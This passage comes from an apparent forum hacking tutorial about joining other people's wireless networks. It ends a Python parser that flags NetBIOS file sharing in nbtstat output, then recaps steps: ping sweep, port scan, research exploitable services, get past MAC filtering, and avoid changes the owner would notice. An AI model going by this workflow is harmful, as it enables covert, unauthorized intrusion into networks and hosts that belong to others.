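    """Sorted, de-duplicated list of the services the host registers."""
    return sorted({e["service"] for e in parsed["entries"]})


def file_sharing_advertised(parsed: dict) -> bool:
    """True when a <20> UNIQUE entry (File Server Service) is registered."""
    return any(e["suffix"] == "20" and e["type"] == "UNIQUE" for e in parsed["entries"])


# Constructed sample: a workstation that does register the File Server Service.
SAMPLE_SHARING = """\
Wireless Network Connection 3:
Node IpAddress: [192.168.2.6] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    LAPTOP01       <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    LAPTOP01       <20>  UNIQUE      Registered
    WORKGROUP      <1E>  GROUP       Registered

    MAC Address = 00-11-22-33-44-55
"""

# Constructed sample: the same layout, but no <20> entry.
SAMPLE_NO_SHARING = """\
    PRINTSRV       <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    WORKGROUP      <1E>  GROUP       Registered

    MAC Address = 00-11-22-33-44-66
"""

if __name__ == "__main__":
    for sample in (SAMPLE_SHARING, SAMPLE_NO_SHARING):
        parsed = parse_nbtstat(sample)
        print(parsed["mac"], services_advertised(parsed),
              "file sharing:", file_sharing_advertised(parsed))
```
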
There are many things that you can do now – some will work, most will not. It is all about research to see what your options are.

[b]To reiterate:[/b]
– Find the IP range in use;
– Find the default gateway, which will usually be the IP of the AP;
– Try to connect to the AP’s admin page by typing the IP into a web browser;
– Ping sweep the IP range to see what hosts are up;
– Port scan each individual host to see what services are running;
– Research the active services – what they are, how they work, etc;
– Research how to exploit a service that looks “interesting”;
– Do NOT make any changes that the AP’s owner will notice, such as changing the password, unnecessarily deleting the AP’s logs, etc.

The intent of this paper was to show you how to authenticate to an AP that has SSID broadcasting either enabled or disabled and how to connect to one that has MAC address filtering enabled, and also to give you a few basic tips and a push in the right direction to show you the kind of things you can do when you have managed to connect.
There are thousands of possible services that can be running on the hosts behind an AP – some with easy to exploit flaws, some with flaws that are harder to exploit and some with no flaws at all – but these services are the key to connecting to ANY computer; if there are no services running, you can’t connect to the host.

You need to read up on any services you find running and see if they can be exploited – I gave you a common example with the NetBIOS service to show you the type of things you are able to do when you have identified a service. Now you need to identify a service or two that interest you and read up on them.

Any questions about this can be posted in this thread. Alternatively, feel free to start a thread of your own (in the relevant forum) to ask your question.

Please DO NOT email or PM me to ask me any questions personally, as I will not reply to them.

Thanks

Nokia

//If you have a web site and would like to link to this or replicate it on your site then you may do so as long as you link back to here with the proper credit. Please do not do as some lame skiddie called Krozo did on what has to be the worst forum I have ever seen [url=http://team-hp.com/forum/index.php?showtopic=463&st=0&gopid=4038&#entry4038]here[/url] with Part One: he not only tried to pass it off as their own but also thanked ME for helping THEM write it!
